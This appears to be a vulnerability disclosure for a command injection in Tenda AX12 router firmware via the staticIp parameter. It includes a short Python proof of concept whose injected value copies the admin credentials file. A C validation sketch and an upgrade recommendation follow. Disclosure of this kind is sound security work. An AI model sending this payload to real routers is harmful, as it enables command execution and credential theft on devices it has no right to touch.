Vulnerability description

Equipment: Tenda-AX12

Firmware version: V22.03.01.16_CN(AX12 upgrade software_Tenda official website)

Vulnerability Type: Command Injection

Attack effect: arbitrary command execution

Vulnerability description

The vulnerability exists because sub_42581C, the function called by the fast_setting_internet_set interface, does not filter the value of the user-controlled staticIp parameter, resulting in command injection.

sub_42581C()

The function first obtains the value of the staticIp parameter and assigns it to v4, then calls sprintf to format that input into the string v5, and finally calls doSystemCmd_route to execute the command. No character filtering is performed on the value of staticIp at any point, so any command placed in this parameter reaches doSystemCmd_route and is executed.
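
The missing check described above, sketched as an added example (not code from the firmware or from the original write-up): staticIp is validated as a strict IPv4 literal before it is formatted into a command. The function names and the `route add` format string are assumptions, since the page does not show the real format string.

```c
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>

/* Accept only a strict dotted-quad IPv4 literal: digits and dots only, then a
 * successful inet_pton() parse. Shell metacharacters fail the strspn() check. */
int is_valid_ipv4(const char *s)
{
    struct in_addr addr;
    size_t len = s ? strlen(s) : 0;

    if (len < 7 || len > 15)            /* "0.0.0.0" .. "255.255.255.255" */
        return 0;
    if (strspn(s, "0123456789.") != len)
        return 0;
    return inet_pton(AF_INET, s, &addr) == 1;
}

/* Hypothetical stand-in for the handler's formatting step. The real format
 * string is not shown on the page; "route add -host %s dev eth1" is assumed.
 * Returns 0 and fills out on success, -1 if the input is rejected. */
int build_route_cmd(const char *static_ip, char *out, size_t out_len)
{
    int n;

    if (!is_valid_ipv4(static_ip))
        return -1;                      /* reject before any formatting */
    n = snprintf(out, out_len, "route add -host %s dev eth1", static_ip);
    if (n < 0 || (size_t)n >= out_len)
        return -1;                      /* a truncated command is never run */
    return 0;
}

int main(void)
{
    /* Constructed sample inputs; the second is the staticIp value from the PoC. */
    const char *samples[] = { "192.168.1.10", ";cp /etc/config/admin /tmp/hack;",
                              "10.0.0.1;x", "256.1.1.1" };
    char cmd[64];

    for (size_t i = 0; i < sizeof(samples) / sizeof(samples[0]); i++) {
        if (build_route_cmd(samples[i], cmd, sizeof(cmd)) == 0)
            printf("accepted: %s\n", cmd);
        else
            printf("rejected: %s\n", samples[i]);
    }
    return 0;
}
```

Validation of this kind narrows the input; passing the address as a separate argument to an exec-style call instead of building a shell string removes the injection point entirely.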

POC

PoC for the command injection. In a real deployment, the request must be authenticated first.

import requests

url = "http://192.168.112.131/goform/fast_setting_internet_set"
cmds = ";cp /etc/config/admin /tmp/hack;"


payload = {'wanType': '1', 'staticIp': cmds}
r = requests.post(url, data=payload)
print(r.status_code)
print(r.content)

The effect of the attack is as follows: the admin file, which stores the userpass in the configuration directory, is copied to /tmp/hack.

Suggestion

It is recommended to upgrade the firmware to the latest version, V22.03.01.21.